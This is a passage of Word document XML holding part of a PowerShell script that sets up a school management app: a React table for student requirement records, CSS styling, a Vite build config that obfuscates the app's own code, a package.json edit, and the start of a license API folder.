        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            })}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9D46A06A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21BA3E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF17A86">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E86BC9EF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div className="card"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B16AC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-header"&gt;Student Requirement Records (Enter Details/Quantity)&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4A5D6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-body" style={{ overflowX: 'auto' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8CD699CF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;table className="data-table"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABABF7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;thead&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7E1FA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;tr&gt;&lt;th&gt;Adm No&lt;/th&gt;&lt;th&gt;Student Name&lt;/th&gt;&lt;th&gt;Section&lt;/th&gt;{requirements.map(function(r, i) { return &lt;th key={i} style={{ textAlign: 'center', minWidth: '120px' }}&gt;{r.name}&lt;/th&gt;; })}&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF1A9F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/thead&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9ABE95">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B3602">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              {students.map(function(s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E6BA3EE8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C0900368">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                  &lt;tr key={s.id}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FA08D526">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;td&gt;{s.admission_number || '-'}&lt;/td&gt;&lt;td&gt;{s.first_name} {s.last_name}&lt;/td&gt;&lt;td&gt;{s.student_type || 'Day'}&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA5BC7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    {requirements.map(function(r, i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129CABB5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                      var val = records[s.id] &amp;&amp; records[s.id][r.name] ? records[s.id][r.name] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F4660A23">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                      var applies = r.section === 'All' || r.section === s.student_type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D6E967C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                      return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E7DBC1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;td key={i} style={{ textAlign: 'center' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E86E13">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                          {applies ? (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB6CAB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;input type="text" value={val === 1 ? '' : val} placeholder="e.g. 6/12 or Done" onChange={function(e) { updateRecord(s.id, r.name, e.target.value); }} style={{ width: '90px', padding: '4px', border: '1px solid #ccc', borderRadius: '4px', textAlign: 'center' }} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F1493406">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                          ) : ( &lt;span style={{ color: '#ccc' }}&gt;-&lt;/span&gt; )}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC078D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E888E5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                      );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1350F544">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    })}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA74860">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                  &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A34FF59D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F921DB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              })}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="82D19750">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFBFBCB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D849FDA5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480556EE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F4E5F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A910811">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B9327FF2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939A017">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D6ED098B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path $reqPath -Value $reqContent -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B825E2A2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="D88435EB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 12. APPLY PREMIUM CSS ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566D717F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[12/15] Applying Premium UI CSS..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C6DAC03D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $cssPath = Join-Path $root "src\App.css"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8362C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $css = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BC1DB524">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>:root { --primary: #1a73e8; --primary-light: #e8f0fe; --primary-dark: #1557b0; --success: #0d904f; --danger: #d32f2f; --warning: #f9ab00; --bg-main: #f0f2f5; --text-main: #202124; --text-sec: #5f6368; --shadow-sm: 0 1px 3px rgba(0,0,0,0.08); --shadow-md: 0 4px 12px rgba(0,0,0,0.08); --shadow-lg: 0 10px 30px rgba(0,0,0,0.12); --radius: 12px; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2452D4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>* { margin: 0; padding: 0; box-sizing: border-box; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B7250503">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>body { font-family: 'Inter', 'Segoe UI', Tahoma, sans-serif; background: var(--bg-main); color: var(--text-main); -webkit-font-smoothing: antialiased; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B87B7D8F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.page-container { padding: 32px; } .page-title { color: var(--text-main); font-size: 24px; font-weight: 700; margin-bottom: 24px; letter-spacing: -0.5px; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8E3C3A1F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.layout-main { background: var(--bg-main); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A70D1DC1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.card { background: rgba(255, 255, 255, 0.95); backdrop-filter: blur(10px); border: 1px solid rgba(255,255,255,0.6); border-radius: var(--radius); box-shadow: var(--shadow-sm); margin-bottom: 24px; transition: box-shadow 0.3s ease, transform 0.3s ease; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F7E326FA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.card:hover { box-shadow: var(--shadow-md); } .card-header { padding: 16px 24px; border-bottom: 1px solid #f1f3f4; font-weight: 600; font-size: 15px; color: var(--text-main); display: flex; justify-content: space-between; align-items: center; } .card-body { padding: 24px; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084D655">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.data-table { width: 100%; border-collapse: collapse; } .data-table th { text-align: left; padding: 12px 16px; background: #f8f9fa; color: var(--text-sec); font-size: 11px; font-weight: 700; text-transform: uppercase; letter-spacing: 0.5px; border-bottom: 2px solid #e0e0e0; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="94F28CC6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.data-table td { padding: 14px 16px; border-bottom: 1px solid #f1f3f4; font-size: 14px; } .data-table tr:hover { background: var(--primary-light); transition: background 0.2s; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7B39E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.form-input { width: 100%; padding: 12px 16px; border: 1px solid #dadce0; border-radius: 8px; font-size: 14px; transition: all 0.2s; background: #fff; color: var(--text-main); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E2B83">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.form-input:focus { border-color: var(--primary); box-shadow: 0 0 0 4px rgba(26, 115, 232, 0.1); outline: none; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D181DB4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.btn { display: inline-flex; align-items: center; justify-content: center; padding: 10px 24px; border: none; border-radius: 8px; font-size: 14px; font-weight: 600; cursor: pointer; transition: all 0.2s; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F6A94A78">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.btn-primary { background: var(--primary); color: white; } .btn-primary:hover { background: var(--primary-dark); transform: translateY(-1px); box-shadow: 0 4px 8px rgba(26, 115, 232, 0.3); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C60780B7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.btn-secondary { background: #fff; color: var(--primary); border: 1px solid #dadce0; box-shadow: none; } .btn-secondary:hover { background: #f8f9fa; border-color: var(--primary); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8266C8EB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>aside { border-right: 1px solid #e0e0e0; transition: width 0.3s ease; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED26839">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.sidebar-link { display: flex; align-items: center; gap: 12px; padding: 12px 24px; color: var(--text-sec); text-decoration: none; font-size: 14px; font-weight: 500; border-left: 4px solid transparent; transition: all 0.2s; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EC3685A2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.sidebar-link:hover { background: #f8f9fa; color: var(--primary); } .sidebar-link.active { background: var(--primary-light); color: var(--primary); font-weight: 600; border-left: 4px solid var(--primary); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D4882">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>::-webkit-scrollbar { width: 8px; height: 8px; } ::-webkit-scrollbar-track { background: transparent; } ::-webkit-scrollbar-thumb { background: #c1c1c1; border-radius: 4px; } ::-webkit-scrollbar-thumb:hover { background: #a1a1a1; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A96FFB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E8A2954E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path $cssPath -Value $css -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B674B2C6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73249ACB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 13. BUILD CONFIG ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FB0D047A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[13/15] Configuring Vite Obfuscation + ASAR Security..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C447C57D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $vitePath = Join-Path $root "vite.config.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C55E8DC8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $viteContent = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="83C7F060">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>import { defineConfig } from 'vite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FE28EAE5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>import react from '@vitejs/plugin-react'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BE379E79">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>import JavaScriptObfuscator from 'javascript-obfuscator';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C1C93C6D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48053150">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>export default defineConfig({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E816621">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  plugins: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D607A4D5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    react(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E85F1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9C7A0CF0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      name: 'obfuscator',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E687C18F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      apply: 'build',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9324D78B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      renderChunk(code) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EFA77">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        const obfuscatedCode = JavaScriptObfuscator.obfuscate(code, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F98E3A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          compact: true, controlFlowFlattening: true, controlFlowFlatteningThreshold: 0.75,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164A7A9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          deadCodeInjection: true, deadCodeInjectionThreshold: 0.4, debugProtection: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F09CEA7D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          debugProtectionInterval: 2000, disableConsoleOutput: true, identifierNamesGenerator: 'hexadecimal',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C85CE7B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          numbersToExpressions: true, renameGlobals: false, selfDefending: true, stringArray: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B20FBC87">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          stringArrayCallsTransform: true, stringArrayEncoding: ['rc4'], stringArrayThreshold: 0.75,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C8764B50">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          transformObjectKeys: true, unicodeEscapeSequence: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774B5C5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }).getObfuscatedCode();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B7223E9B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return { code: obfuscatedCode, map: null };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EA514480">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B4A2AAFD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C83891">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F75F37">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  build: { outDir: 'dist', emptyOutDir: true }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D3630EF2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D4E842F6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F933A4A8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path $vitePath -Value $viteContent -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27168BCD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B62534A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $pkgPath = Join-Path $root "package.json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CD0E4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $pkgPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CDF54FDE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $pkgPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CB92482C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Use single-quote regex to avoid double-quote escaping mess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D98388DD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace '\n\s*"asarUnpack": \["\*\*/\*\.\*"\],?', ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DD3F5BE1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch '"asar": true') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BC8DB5B8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace '"build": \{', ('"build": {' + "`n" + '    "asar": true,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CE0AD171">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B11846CE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $pkgPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F07D7C16">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5123B8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="B6ECB626">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 14. VERCEL API ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EF512B69">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[14/15] Building Vercel API..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FDA3E376">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $apiDir = Join-Path $root "vercel-license-api"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CE512C68">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>New-Item -ItemType Directory -Path $apiDir -Force | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D1B20B99">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
